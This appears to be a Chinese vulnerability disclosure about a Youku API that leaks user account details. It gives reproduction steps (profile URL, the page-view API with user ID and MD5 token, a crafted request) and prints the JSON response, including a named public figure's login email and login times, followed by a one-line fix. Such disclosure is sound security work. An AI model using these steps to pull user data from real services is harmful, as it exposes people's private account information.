优酷系统的API,在输出用户信息时未进行严格的业务逻辑设计,直接输出了用户的邮箱、用户名、用户密码、用户登录IP、用户手机、QQ、MSN等敏感信息。
#1 访问老罗的个人主页
http://i.youku测试数据/u/id_UMTcwMjk0NA==
#2 个人主页页面会自动请求如下API,获取用户的个人主页访问量
http://i.youku测试数据/user_pv/id_425736_md5_1e522f6831febf75e033cfe26fd0cec4_time_1372057646. html
id_425736_md5,id后的数字为用户的个人真实ID
# 构造请求获取用户数据
# 此处用测试帐号演示
{"userId":"425736","userName":"\u8001\u7f57","name":null,"regDate":"2006-11-04 10:06:54","contentTotal":"28","scoreTotal":"380","favTotal":"0","friendTotal":"0","pkTotal":"3091716","clubTotal":"0","gender":"0","city":"1","birthDay":"0000-00-00","birthDayDesc":"\u65e0\u678160","icon":"100","pvTotal":"391291","orderBy":null,"lastLoginDate":"2006-11-04 10:06:54","lastLoginDateDesc":"6\u5e74\u524d","statValue":null,"subTotal":null,"userSet":"23","email":"laol@youku测试数据","returnType":null,"icon64":"","icon150":"","iconUpdateTime":null,"contentFavTotal":"13159","ecdUserId":"UMTcwMjk0NA==","genderDesc":"\u7537","cityDesc":"\u5317\u4eac\u5e02","QQ":"","MSN":"","intro":"","status":"1","contentPvTotal":"15564997","messageTotal":"0","subscribeTotal":"0","folderTotal":"1","folderPvTotal":0},"info":{"email_status":0,"uid":425736,"reason":null,"status":0,"nickname":"\u8001\u7f57","bflag":0,"from":null,"nameCheckStatus":0,"ctime":1319188273080,"username":"\u8001\u7f57","email":"laol@youku测试数据","domain":"","tmpEmail":"","oldUsername":null,"login":1371969255588,"nameVersion":0,"mobile":""},"verified_icon":1,"encode_id":"UMTcwMjk0NA==","is_self":false,"login_user_id":"65214337","login_user_encode_id":"UMjYwODU3MzQ4","it":"\u4ed6","is_official":false,"rolltips":0,"firstrunGuide":1,"firstrunGuidee":2,"firstrunGuideee":0,"favtips":0,"canuseboard":1,"canusebanner":1,"board":{"state":0,"content":""},"mod":{"m_headline":1,"m_video":1,"m_playlist":1,"m_favorite":1,"m_statuses":1,"m_user":1,"m_guestbook":1,"m_friend":1,"m_follower":1,"m_visitor":1,"id":425736,"m_address":1},"pvtime":1372064276,"pvmd5":"79cdb02deead4aede3cf7c4fa8547ac7"}}
获得罗永浩的登录邮箱为:laol@youku测试数据
修复方案:
不该输出的信息还是尽量不要输出。
查看更多关于优酷某接口任意用户信息获取漏洞,可获取指定的详细内容...